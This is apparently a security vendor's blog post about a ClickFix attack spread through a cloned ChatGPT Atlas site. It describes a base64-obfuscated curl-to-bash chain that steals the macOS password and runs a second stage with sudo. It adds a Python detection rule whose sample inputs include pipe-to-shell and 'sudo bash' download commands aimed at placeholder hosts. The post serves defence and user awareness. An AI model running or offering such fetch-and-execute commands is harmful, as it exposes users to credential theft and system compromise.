The TL;DR
- Over the holiday, I happened upon a fake ChatGPT Atlas site
- The site’s instructions led me to password-stealing malware—a ClickFix attack!
- The attack bypasses all the good endpoint protections
- It’s a perfect storm: site cloning, trusted hosting, obfuscated commands, and privilege escalation
- Scroll down for a free video to warn your team about this type of attack
Over the Thanksgiving holiday, I embarked on a small project to evaluate AI browsers, including the buzzy ChatGPT Atlas. Like most people, I clicked the first result I saw: a sponsored link. The page looked nearly identical to the real Atlas site: same layout, design, copy. The only subtle giveaway was the domain: a Google Sites URL. That’s increasingly common in modern phishing kits—tools like v0.dev make it trivial to clone a legitimate site in minutes, and hosting on Google Sites adds a false sense of credibility for anyone who thinks Google = trustworthy. Given our work here at Fable, I was pretty excited to have stumbled on this, and decided to give it a whirl and see just how much damage I could cause.
Instead of getting a standard installer (.dmg), the fake site asked me to paste a command into Terminal. (By the way, this is the point where most people—especially curious or rushed users—might comply. And that’s exactly what attackers count on.) The command itself looked cryptic but harmless: a base64-encoded string passed into curl and executed with bash. But it got nefarious pretty quickly: it decoded to a remote script hosted at https://tenkmo[dot]com/gdrive, a domain controlled by the attacker.
The downloaded script repeatedly prompted for my macOS password until the correct one was entered. Here’s the script:
Once captured, it used that password to run a second-stage payload from https://shrimpfc[dot]com/drive/update with elevated privileges (sudo). That payload—which VirusTotal confirms is malicious—was then free to do whatever it wanted.
Mystery solved! It’s a variation of an attack we’ve seen before: ClickFix. Notably, neither CrowdStrike nor SentinelOne flagged it on download. This is becoming more common: social engineering plus user-granted execution can bypass even strong endpoint defenses.
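The chain above (a base64 blob hidden in a command, a remote fetch, output piped straight into a shell, and sudo in the second stage) is exactly the shape a detection rule can key on in process-execution telemetry. The following is an added example written for this post, not code from Fable or from the malware itself: it decodes any base64 tokens embedded in a logged command line, looks for the ClickFix building blocks in both the raw and decoded text, and flags the line when a pipe-to-shell is combined with a remote fetch or an obfuscated payload. The sample command lines are constructed and use the reserved `example.invalid` domain, not the attacker domains named above.

```python
import base64
import re

# Building blocks of the ClickFix pattern described in the post: a remote
# fetch, a base64 decode step, output piped into a shell, and sudo.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b")
B64_DECODE = re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+(-\S+\s+)*)?(ba|z)?sh\b")
SUDO = re.compile(r"\bsudo\b")
URL = re.compile(r"https?://")
# A run of 16+ base64 alphabet characters with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _looks_like_text(s: str) -> bool:
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_embedded_base64(command: str) -> list[str]:
    """Return the plaintext of every base64 blob in the command that decodes to text."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary content
        if _looks_like_text(text):
            decoded.append(text)
    return decoded


def analyze_command(command: str) -> dict:
    """Score one logged command line for ClickFix indicators."""
    indicators = set()
    if REMOTE_FETCH.search(command):
        indicators.add("remote_fetch")
    if B64_DECODE.search(command):
        indicators.add("base64_decode")
    if PIPE_TO_SHELL.search(command):
        indicators.add("pipe_to_shell")
    if SUDO.search(command):
        indicators.add("sudo")

    decoded = decode_embedded_base64(command)
    for text in decoded:  # look inside the obfuscated layer as well
        if REMOTE_FETCH.search(text):
            indicators.add("decoded_remote_fetch")
        if PIPE_TO_SHELL.search(text):
            indicators.add("decoded_pipe_to_shell")
        if SUDO.search(text):
            indicators.add("decoded_sudo")
        if URL.search(text):
            indicators.add("decoded_url")

    pipe = indicators & {"pipe_to_shell", "decoded_pipe_to_shell"}
    fetch = indicators & {"remote_fetch", "decoded_remote_fetch"}
    obfuscated = indicators & {"base64_decode", "decoded_url"}
    suspicious = bool(pipe and (fetch or obfuscated))
    return {
        "command": command,
        "decoded": decoded,
        "indicators": sorted(indicators),
        "suspicious": suspicious,
    }


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample command lines (hypothetical, example.invalid placeholders).
SAMPLE_COMMANDS = [
    # 1. URL hidden in base64, decoded inline, result piped into bash
    f'curl -fsSL "$(echo {_b64("https://example.invalid/gdrive")} | base64 -d)" | bash',
    # 2. whole first-stage script carried as base64; second stage runs under sudo
    f'echo {_b64("curl -s https://example.invalid/drive/update | sudo bash")} | base64 -d | bash',
    # 3. ordinary installer download: fetch, but no pipe into a shell
    "curl -fsSL https://example.invalid/Atlas.dmg -o ~/Downloads/Atlas.dmg",
    # 4. benign base64 use with nothing executed
    f'echo {_b64("release notes: nothing to see here")} | base64 -d',
    # 5. checksum verification: the pipe target is shasum, not a shell
    "curl -sL https://example.invalid/Atlas.dmg | shasum -a 256",
]


def analyze_all(commands=SAMPLE_COMMANDS) -> list[dict]:
    return [analyze_command(c) for c in commands]


if __name__ == "__main__":
    for result in analyze_all():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['indicators']}  {result['command'][:60]}")
```

The rule deliberately requires two things at once: a shell as the pipe target and either a remote fetch or an obfuscation layer. That keeps normal downloads, checksum pipelines and harmless base64 usage (samples 3 to 5) quiet while still catching both the inline-URL variant and the fully encoded script.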
This should go without saying, but do not try this at home! This attack is a textbook example of how modern phishing blends AI-generated site cloning, trusted hosting platforms, obfuscated commands, and privilege escalation—all without a single traditional “phishing email.” It also illustrates a critical truth: users don’t need to fall for an email spoof anymore; simply searching for something and clicking the wrong sponsored link can lead to compromise.
We’ve created a short, practical briefing video on ClickFix that you can download for free and share with your team. It walks through why you should never run command-line instructions provided by a website, how attackers disguise malicious installers, and how to verify software safely.
Use the button below to download this briefing, and share it with your team.